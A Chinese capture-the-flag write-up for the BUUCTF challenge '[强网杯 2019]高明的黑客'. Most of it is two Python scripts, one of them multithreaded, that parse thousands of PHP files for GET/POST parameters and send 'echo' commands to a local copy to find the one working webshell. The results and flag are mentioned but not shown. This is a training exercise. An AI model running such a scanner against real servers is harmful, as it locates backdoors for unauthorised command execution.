BUUCTF WEB [强网杯 2019]高明的黑客
打开网页,发现有提示~~源码可下
下载源码,发现3002个文件,查看一下,发现有不少的shell???
不过都是不能用的,其实这道题目就是让我们找到能用的shell,考察的应该是脚本的编写能力吧!!
源码已经down下来了,在本地搭一个环境,php 7.0以上,否则会报语法错误!
然后编写脚本(特别慢):
import requests
import sys
import os
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send():
for i in files:
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Get:%s" % (j))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
Send()
这个脚本垃圾的一批,估计要跑一天,,,太菜了呀,直接放弃掉这个脚本了,,
可是好像也不会多线程啥的呀???哭了!!!搜了一下python3的多线程,改了一下:
import requests
import sys
import os
import threading
import time
url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)
def GetGet(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_GET['") > 0:
start = i.find("$_GET['") + 7
end = i.find("'",start)
a.append(i[start:end])
return a
def GetPost(file):
a = []
f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
content = f.readlines()
for i in content:
if i.find("$_POST['") > 0:
start = i.find("$_POST['") + 8
end = i.find("'",start)
a.append(i[start:end])
return a
def Send(start,end):
start = int(start)
end = int(end)
for i in range(start,end):
i = files[i]
get = GetGet(i)
print("Try filename: %s"%i)
for j in get:
NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
s = requests.get(NewUrl)
if("Success" in s.text):
print("Success! Url:%s" % (NewUrl))
break
post = GetPost(i)
for j in post:
NewUrl = url+"%s"%(i)
s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
if("Success" in s.text):
print("Success! Post:%s" % (j))
break
class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
Send(self.name, self.counter)
for i in range(0,150):
thread = myThread(i,i*20,(i+1)*20)
thread.start()
跑了大概20多分钟吧,得到了:
直接去进行命令执行!!
最后得到了flag:
尽力了,只能将时间缩减到20多分钟,,,
哪位大佬如果知道更快的方法麻烦指导一下,,,,,感激不尽!!!